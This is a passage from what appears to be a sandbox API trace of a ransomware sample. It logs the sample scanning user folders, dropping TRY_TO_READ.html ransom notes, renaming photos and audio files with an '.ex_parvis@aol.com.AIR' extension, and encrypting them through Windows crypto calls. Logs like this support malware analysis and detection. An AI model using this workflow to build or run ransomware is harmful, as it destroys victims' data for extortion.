nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0172.961] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xb4dbda50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4dbda50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2368 [0172.961] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4dbda50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4dbda50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b23a8 [0172.962] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0172.964] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0172.974] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="updates", cAlternateFileName="")) returned 0xffffffff [0172.974] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4dbda50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4dbda50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384170 [0172.975] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb4ea2290, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4ea2290, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3841b0 [0172.975] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0172.977] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0172.979] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xb4ea2290, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4ea2290, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3841f0 [0172.980] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0172.984] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb4ea2290, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4ea2290, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384230 [0172.984] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0172.986] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0172.988] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0172.990] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0172.992] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0172.994] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4ec83f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4ec83f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384270 [0172.994] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60c [0172.996] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xb4ec83f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4ec83f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3842b0 [0172.997] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0173.000] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4ec83f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb4ec83f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3842f0 [0173.000] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0173.002] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0173.005] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x832a470, ftCreationTime.dwHighDateTime=0x1d4d181, ftLastAccessTime.dwLowDateTime=0xb5103890, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb5103890, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384330 [0173.005] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\XSRl\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\xsrl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0173.007] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.007] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.007] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp", dwFileAttributes=0x80) returned 1 [0173.008] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp") returned 86 [0173.008] GetProcessHeap () returned 0x2e0000 [0173.008] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x112) returned 0x32f900 [0173.008] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp" [0173.008] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0173.008] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\tzihb0piv95lrsbw1.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\tzihb0piv95lrsbw1.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.014] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TZIhB0piV95lRsbW1.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\tzihb0piv95lrsbw1.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0173.014] GetProcessHeap () returned 0x2e0000 [0173.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.014] GetFileSizeEx (in: hFile=0x618, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=27863) returned 1 [0173.014] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6cd7 [0173.014] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.014] GetProcessHeap () returned 0x2e0000 [0173.014] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.014] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.014] WriteFile (in: hFile=0x618, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.015] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.015] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x618, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x6cd7, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x6cd7, lpOverlapped=0x0) returned 1 [0173.016] SetFilePointer (in: hFile=0x618, lDistanceToMove=-27863, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.016] WriteFile (in: hFile=0x618, lpBuffer=0x3110048*, nNumberOfBytesToWrite=0x6cd7, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesWritten=0x2acf9c8*=0x6cd7, lpOverlapped=0x0) returned 1 [0173.018] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.018] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.018] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg", dwFileAttributes=0x80) returned 1 [0173.019] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg") returned 89 [0173.019] GetProcessHeap () returned 0x2e0000 [0173.019] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x118) returned 0x32f900 [0173.019] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg" [0173.019] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0173.019] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\q_uy1imdw7-psi5--bv8.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\q_uy1imdw7-psi5--bv8.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.022] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Q_uY1iMDw7-psi5--bV8.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\q_uy1imdw7-psi5--bv8.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0173.022] GetProcessHeap () returned 0x2e0000 [0173.022] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.022] GetFileSizeEx (in: hFile=0x618, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=87634) returned 1 [0173.022] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15652 [0173.022] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.022] GetProcessHeap () returned 0x2e0000 [0173.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.022] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.022] WriteFile (in: hFile=0x618, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.023] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.023] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x618, lpBuffer=0x3110048, nNumberOfBytesToRead=0x15652, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x15652, lpOverlapped=0x0) returned 1 [0173.027] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.027] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.027] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a", dwFileAttributes=0x80) returned 1 [0173.028] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a") returned 75 [0173.028] GetProcessHeap () returned 0x2e0000 [0173.028] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0173.028] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a" [0173.028] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS 